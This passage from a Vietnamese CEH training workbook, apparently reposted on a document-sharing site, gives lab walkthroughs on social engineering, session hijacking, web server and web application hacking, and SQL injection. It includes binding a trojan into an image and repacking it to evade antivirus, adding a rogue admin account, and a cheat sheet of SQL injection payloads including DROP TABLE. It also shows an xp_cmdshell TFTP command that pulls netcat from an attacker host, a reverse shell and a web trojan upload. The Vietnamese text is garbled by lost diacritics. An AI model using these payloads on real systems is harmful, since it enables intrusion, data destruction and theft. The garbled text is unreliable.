Tải bản đầy đủ (.pdf) (47 trang)

Tài liệu CEH Lab book tiếng Việt phần 3 doc

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (4.45 MB, 47 trang )

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 74
Bài 7:
Social Engineering


I/ Gii Thiu

K thut la đo (Social Engineering) là mt th thut đc nhiu hacker s dng cho
các cuc thâm nhp vào các h thng mng, máy tính. ây là mt trong nhng phng thc
hiu qu đ đánh cp mt khu, thông tin, tn công vào h thng.

Di đây là câu chuyn có tht v mt trong nhng hacker ni ting nht th gii
trong vài nm tr
 li đây - Kevin Mitnick (M, tng b 8 nm tù vì ti tn công vào h thng
máy tính), chuyên gia hàng đu v k thut Social Engineering. Lên k hoch tn công vào
công ty X, Kevin vn dng k nng này đ dò tìm thông tin liên quan đn ông tng giám đc
và mt tr lý ca ông này. Li dng lúc hai ngi đi công tác, anh ta s dng Call ID gi,
nhái ging nói ca viên tr lý đ gi đn qun tr mng công ty, yêu cu gi mt kh
u đng
nhp vào h thng ca tng giám đc vì ngài đã quên mt khu. Qun tr viên kim tra mt
vài thông tin v "viên tr lý", nhng Kevin đã có đ thông tin và s khôn ngoan đ tr li. Kt
qu là Kevin đã ly đc mt khu và kim soát toàn b h thng mng ca công ty X.

Mt hình thc la đo khác: Mt ngày xu tri nào đó, bn nhn đc đ
in thoi,
đu dây bên kia là mt ging nói ngt ngào: "Chào anh, dch v mà anh đang s dng ti
công ty chúng tôi hin đang b trc trc vi account (tài khon) ca anh.  ngh anh gi gp
thông tin v tài khon cho chúng tôi đ điu chnh li". Mi nghe qua tng nh đây là mt
kiu la thô thin, nhng xác sut thành công rt cao, đc bit khi ging nói đó d thng nh


my cô trc tng đài 1080! Phng cách la đo tng t là dùng k thut "Fake Email
Login". V nguyên tc, mi khi đng nhp vào hp th thì chúng ta phi đin thông tin tài
khon gm username và password ri gi thông tin đn mail server đ x lý. Li dng điu
này, hacker đã thit k các trang đng nhp gi (Fake Login) đ các thông tin đc gi đn
cho h.

Tóm li, k thut Social Engineering rt
đa dng, phong phú và cng ht sc nguy
him do tính hiu qu và s ph bin. K thut này không đòi hi phi s dng quá nhiu yu
t k thut, thm chí không có liên quan đn k thut thun túy (non-technical). Hacker có th
thc hin phng cách này thông qua th tín, e-mail, đin thoi, tip xúc trc tip, thông qua
ngi quen, các mi quan h cá nhân nhm dn d, khai thác các thông tin do vô tình b tit
l t
 phía ngi dùng.  VN, k thut này còn khá mi nên không him trng hp b đánh
la mt cách d dàng. Chng hn nm ngoái, hàng lot game th MU Global đã mt sch
sành sanh tài sn (o), khi ngây th đin thông tin tài khon ca mình vào mt e-mail gi mo
admin MU ca hacker!
(Trích dn)
II/ Các bài Lab:

Bài Lab 1: Gi email nc đính kèm Trojan
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 75
 thc hin bài Lab này, ta s dng chng trình Mini-binder đ ghép file trojan vi
hình nh, thay đi icon và chng trình Outlook đ gi email nc danh.

Ghép file hình nh và file trojan, đu tiên ta to 1 file trojan, ly 1 file nh và file ico
bt k đ ghép.




Ta s dng lnh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ
ghép file trojan svchost.exe vi cathu.jpg và vi icon là 60.ico.



Tip theo, ta nén file trojan mi bng Winrar li nhiu ln đ tránh chng trình Anti-
virus(tùy theo phiên bn Anti-virus, tuy nhiên hu ht các trojan không qua mt đc các
chng trình này) và thay đi thông tin ca outlook.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 76

Ta vào ToolåOptionåMail setupåView Accountå Chn Account cn thay đi và
thay đi thông tin Your Name và E-mail Address.




Tip theo Attach file đính kèm vào và gi Email đi. Trong bài Tác gi gi ti đa ch
email

, và sau đó check mail đ kim tra th xem mail đã đn cha.




Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 77
Bài 8:
Session Hijacking


I/ Gii thiu:
Nh ta đã bit v sniffer (nghe lén trong mng), Hacker có th ly bt k thông tin gì
không đc mã hóa, hay có th fake CA đ có th ly thông tin trong giao thc HTTPS, bây
gi ta có thêm 1 k thut na là session hijacking.  thc hin đc bài lab này trc tiên ta
phi s dng ARP spoof, sau đó s dng phn mm T-sight hay Hunt đ giành ly session t
phía máy nn nhân.

II/ Thc hin bài Lab
Trong bài Lab, tác gi s dng Vmware đ thc hi
n, s dng máy đ th nghip
TELNET và SSH. Còn 2 máy còn li 1 s dng Window 2000(đã cài sn tool T-sight) và 1 s
Linux đ test SSH.



Vic cài đt phn mm khá d dàng, bn cn phi thêm phn driver và chuyn v IP
192.168.200.0/24 do đang s dng bn Trial.

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 78

Sau khi cài đt xong, trên máy 192.168.200.1 thit lp cho phép các máy khác telnet.
Và t máy 192.168.200.2 telnet đn máy 192.168.200.1.



Và d liu thu đc t máy 192.168.200.2, s dng tính nng Take Over trong Tool
T-sight đ ly session.





Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 79


Sau khi Session b ly, session t máy Telnet s b “ Lost connection” và ngi s
dng trong trng hp này không bit là mình b “Lost Connection “bi nguyên nhân nào.
Bây gi ta bt Service SSH ca máy Linux bng lnh “ Service sshd” và test th session
hijacking đi vi traffic ssh.


























Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 80
Bài 9:
Hacking Web Server
I/ Gii thiu:
Thông thng đ Hacking 1 Web Server, Hacker thng phi xem th Web Server
đang chy h điu hành gì và chy nhng sercice gì trên đó, h điu hành thông thng là các
h điu hành Win 2000 Server, Win 2003 Server, Redhat.v.v. Các Service bao gm Apache,
IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca H điu hành b li hay service khác
b li có th dn ti vic mt quyn kim soát ca h thng. Trong bài thc hành ca phn
này, tác gi
gii thiu li ca h điu hành là DCOM và li ng dng khác là Server-U,
Apache(FTP Server). T nhng li này, ta có th kim soát hoàn toàn máy nn nhân.

II/ Thc Hin bài lab.
Bài Lab 1: Tn công Web Server Win 2003(li Apache)

 bit đc máy Server ca h thng có b li hay không, ta s dng dng phn mm
quét đ kim tra. (Phn này đã đc hc trong scaning).







Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 81

Ta không thy thông tin v FTP Server  đây, do phn mm Retina ch có tính nng
nhn din các Service ca Microsoft và nhng Service thông dng. Còn các Service không
thông dng hn thì phn mm ch thy di dng m port. Trong trng hp này ta thy m
port 21.

Ta s dng Metasploit đ khai thác li Apache và ly đc (Console).


Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 82


Bây gi chúng ta s tìm cách Remote Desktop vào máy 192.168.200.1. Trc tiên ta
to 1 user và add user này vào nhóm admin bng s dng lnh.

Net user vsichao vsichao /add
//thêm user
Net Localgroup Administrators vsichao /add
//đa user vào nhóm Admin



Ta có th kim ta li bng lnh “ Net user” đ kim tra th user ca mình đã đc
quyn admin hay cha.

Tip theo ta th remote Desktop vào máy bng lnh “ mstsc /v 192.168.200.6” . Nu
không đc ta s dng file Openrdp.vbs đ m Remote Desktop. Ta s dng chng trình
Cisco TFTP Server đ đy file này Server nn nhân.



S dng lnh tftp  máy nn nhân đ ly file
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 83


Add user vào và nâng quyn lên Administrator.



Remote Desktop vào vi user là cehclass thành công, nh vy ta đã hoàn toàn kim

soát đc máy nn nhân.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 84


Bài lab 2: Khai thác li ng dng Server U
Tng t nh bài trên, ta s dng chng trinh nmap đ xác đnh version ca ServerU
và s dng metaesploit đ tn công.


























Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 85
Bài 10:
WEB APPLICATION HACKING

I/ Gii thiu:

ng dng Web thông thng s dng d liu đu vào trong các truy cp HTTP (hoc
trong các tp tin) nhm xác đnh kt qu phn hi. Tin tc có th sa đi bt k phn nào ca
mt truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, và thm chí
field n (hidden fields), nhm vt qua các c ch bo mt. Các tn công ph bin dng này
bao gm:

- Chy lnh h th
ng tùy chn
- Cross site scripting
- Li tràn b đm
- Tn công Format string
- SQL injection
- Cookie poisoning
- Sa đi field n


Trong bài thc hành này, ta th khai thác các l hng Cross Site Cripting, Format
string, Cookie Manipulation, Authorization Failure.

II/ Các Bài Lab

Bài Lab 1: Cross Site Scripting
u tiên ta login vào bng username “jv” và password “ jv789” và chn chc nng
“post message”. Sau đó ta post script vào phn message text.



Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 86
Sau đó ta submit đ post script này lên. Ta s dng F5 đ Refresh li trình duyt và
thy xut hin.


Lúc này trình duyt ca nn nhân vô tình đã thc hin script đc user post lên Server.
Da vào script này, tin tc có th n cp cookie ca nn nhân và log in vào h thng.

Bài Lab 2: Insufficient Data Validation
Trong bài Lab này khi chuyn tin t tài khon này sang tài sn khác, tham s amout
luôn luôn phi ln hn 0. Tuy nhiên trong 1 s trng hp Hacker có th thay đi con s này
là s âm bng nhng chng trình “http proxy”. Kt qu này có th gây hi đn các khon tài
chính ca ngân hàng HackmeBank.

Ta th chuyn v
i giá tr Amout 100 t tài khon bt k sang tài khon khác



Kt qu thành công. Ta tip tc chuyn thêm 1 ln na nhng vi giá tr là -100. Tuy
nhiên do có kim tra di phía client nên vic chuyn tin không thành công.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 87




Bây gi ta s dng chng trình Webscarab làm http proxy và thay đi thông s đc
POST lên Server.



Kt qu tr v t Server vic chuyn tin vn thành công


Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 88


Ta kim tra trong Transaction thy có lu li vic chuyn tin.



Bài Lab 3: Cookie Manipulation

Trong lúc login, ta xem trong Cookie có tham s CookieloginAttempts, tham s này
dùng đ lock session khi ai đó c gng login vào khi nhp sai hay không bit password. Tham
s này đm t 5 đn 0. Khi tham s này bng 0 là lúc session b Lock. Ta có th s dng
Webscarab đ thay đi tham s này đ tránh vic Server lock session.


Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 89


Bài Lab 4: Authorization Failure

u tiên ta vào xem các account ca user “jc” password “jc789”.


Ta thy account Number là 5204320422040005, 5204320422040006, 520432
0422040007, 5204320422040008. User jc ch quán lý đc các account thông s trên. Tuy
nhiên ta chú ý đn phn URL khi s dng tính nng “View Transaction”.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 90



Ta thay thông s 5204320422040005 bng thông s 5204320422040004(thông s này
không thuc account qun lý ca user jc). Nh vy web site đang b li phân quyn.



Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 91
Bài 11:
SQL INJECTION


I/ Gii thiu v SQL Injection:
ây là K thut tn công này li dng nhng l hng trên ng dng(không kim tra k
nhng kí t nhp t ngi dùng). Thc hin bng cách thêm các mã vào các câu lnh hay câu
truy vn SQL (thông qua nhng textbox) trc khi chuyn cho ng dng web x lý, Server s
thc hin và tr v cho trình duyt (kt qu câu truy vn hay nhng thông báo li) nh đó mà
các tin tc có th thu thp d

 liu, chy lnh (trong 1 s trng hp) và sau cho có th chim
đc quyn kim soát ca h thng. Sau đây là 1 s th thut cn bn

1) Ly tên table và column hin hành:
Structure:

Login page (or any injection page)::::
username: ' having 1=1

KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the
select list because it is not contained in an aggregate function and there is no GROUP BY
clause.

> Ta có đc TABLE VICTIM

Tip tc
username: ' group by VICTIM.ID having 1=1

KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the
select list because it is not contained in either an aggregate function or the GROUP BY
clause.

Vy là ta có column Vuser

UNION nh mà hiu qu

Vâng tha các bn, ta có th dùng nó đ ly đc gn nh mi th .
Trc ht tôi xin nói s qua cái Structure c

a nó:

Login page::::

username: ' Union select [column] from [table] where [column2= ]
password: everything

Vd: Gi s ta đã bit 2 column username và password trong table VTABLE cua db victim là
VUSER và VPASS thì ta làm nh sau
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 92

username: ' Union select VPASS from VTABLE where VUSER='admin' (1)
password: everything

(1): Trong trng hp này admin là mt user mà bn bit nu không có th b trng, nó s
cho bn user đu tiên

KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target lists.


Nu KQ ra nh trên có ngha là bn phi union thêm nhiu column na đ tt c column ca
table VTABLE đc Union ht. Structure ca nó nh sau:

username: ' Union select VPASS,1,1,1 1,1 from VTABLE where VUSER='admin' (1)
password: everything

Bn hãy thêm ",1" cho đn khi kt qu ra đi loi nh



[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'tuibihackroi' to a column of data type int.


Nh vy Pass ca user 'admin' là 'tuibihackroi'


2) Ly ht value ca mt column đã bit trong m
t table đã bit

Bí quyt  đây là “Not in” Structure ca nó nh sau (s dng ví d vi column ca bài trc):
Vi Vuser là admin ta có th ly đc các user khác

Login Page::::::
username: ‘ Union select Vuser,1,1,1…,1 from Vtable where username not in (‘admin’)—

Sau đó chúng ta s thu đc thêm mt user na và ch vic chèn vào trong Not in (vd: Not in
(‘admin’,’hacker’,….)) c làm tip tc nh th ta s có ht mi user(d nhiên sau đó là mi
password).

**** Ð ly danh sách tên các user theo mt quy đnh mà bn chn, ví d chi ly các user có
cha t
admin chng hn ta dùng “like”: cu trúc

Login Page::::::
username: ‘ Union select Vuser,1,1,1…,1 from Vtable where username not in (‘admin’) like
%admin%—



3) Ly ht table và column ca ca database:
Bí quyt chính là table này ca database: INFORMATION_SCHEMA.TABLES vi column
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 93
TABLE_NAME (cha toàn b table) và table: INFORMATION_SCHEMA.COLUMNS vi
column COLUMN_NAME (cha toàn b column)

Cách s dng dùng Union:

Login page:::::::
username: ‘ UNION SELECT TABLE_NAME,1,1,1…,1 FROM
INFORMATION_SCHEMA.TABLES WHERE …….


Nh vy ta có th ly đc ht table, sau khi có table ta ly ht column ca table đó:

Login page:::::::
username: ‘ UNION SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’… ’ and ……


Trên đây là nhng điu cn bn nht v SQl injection mà tôi có th cung cp cho các bn, còn
làm đc tt hay không thì phi có mt chút sáng to na hy vng nó giúp ích cho các bn
mt chút khi gp mt site b SQl injection


4)Không s dng UNION:

Nu các b

n ngi dùng Union vì nhng bt tin ca nó thì các bn có th dùng "Convert" mt
cách d dàng hn đ thu thp info qua các thông báo li

Structure:

login page::::

user: ' + convert (int,(select @@version))


Trên là mt ví d đ bn ly version, gi đây mun ly bt c info nào bn ch cn thay vào
cái "select @@version" nhng nh nu là ln đu tiên get info thì thêm TOP 1 vào nhé

vd: user: ' + convert (int,(select Vpass from Vtable where Vuser='admin'))

Lu ý: Nu các bn s dng không đc thì có th vì du + không đc chp nhn, lúc đó
hãy thay nó === %2b

vd: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))

5) Run command SQL:

 run command bn có th dùng du ";"

Structure:

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 94
login page:::::
user:' ; [command]



vd: '; DROP TABLE VTABLE

II/ Thc Hành Bài Lab



Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web đ tn công vào
Server 2000(192.168.1.46) và s upload lên Server 2000 trojan webbase, sau đó kim soát
Server này.
u tiên s dng phn mm Acunetix đ quét xem Server Web có b li ng dng gì
không??

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 95


Ta có th test bng tay trong tình hung này bng cách thêm du “ ‘ “ trong form
login.



Sau đây là 1 s đon mã đ ly thông tin v Server khi bit Server b li SQL.

1/lay ten Server name

'and 1=convert(int,@@servername) sp_password

2/lay database name


'and 1=convert(int,db_name()) sp_password

3/kiem tra system user

'and 1=convert(int,system_user) sp_password
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 96

4/'and 1=convert(int,@@version) sp_password

5/Lay thong tin table userinfo

' having 1=1 (xem table hien hanh)

' group by userinfo.username having 1=1 (xem column tiep theo)

Sau khi ly thông tin v Server, Hacker th upload lên Server trojan netcat bng cách
s dng gi hàm shell trong SQL và tftp. Ta đánh vào form login câu lnh sau(phi nh là
máy client s dng TFTP Server):

';exec master xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";
Câu lnh này đc thc thi  h thng Server thông qua SQL, nó s load nc123.exe t
TFTP Server 192.168.1.44. Ta kim tra trên TFTP Server file đã đc gi hay cha.



Sau khi upload thành công trojan netcat, vic bây gi là ta phi chy nó và s dng
telnet ngc ra bên ngoài. Vì lúc này chúng ta đang đng sau Firewall nên không th lng
nghe trên port vì client  ngoài Firewall không th connect vào đc.


Chy lng nghe  phía Client
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 97


Telnet net ngc ra ngoài t Server.


Và kt ni netcat đc hình thành sau khi telnet ngc ra t Server, lúc này chúng ta
đã by pass đc Firewall.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 98



Sau khi kt ni đc màn hình console ca Window, ta tip tc upload thêm 1 trojan
di dng web thông qua TFTP.



Trojan web mà chúng ta s dng là zehir4.asp, đây là trojan khá nhiu tin dng. T
trojan này ta có th thc hin d dàng vic xóa Database, vic download các file t Server
2000 v máy ca mình thông qua Port Web

×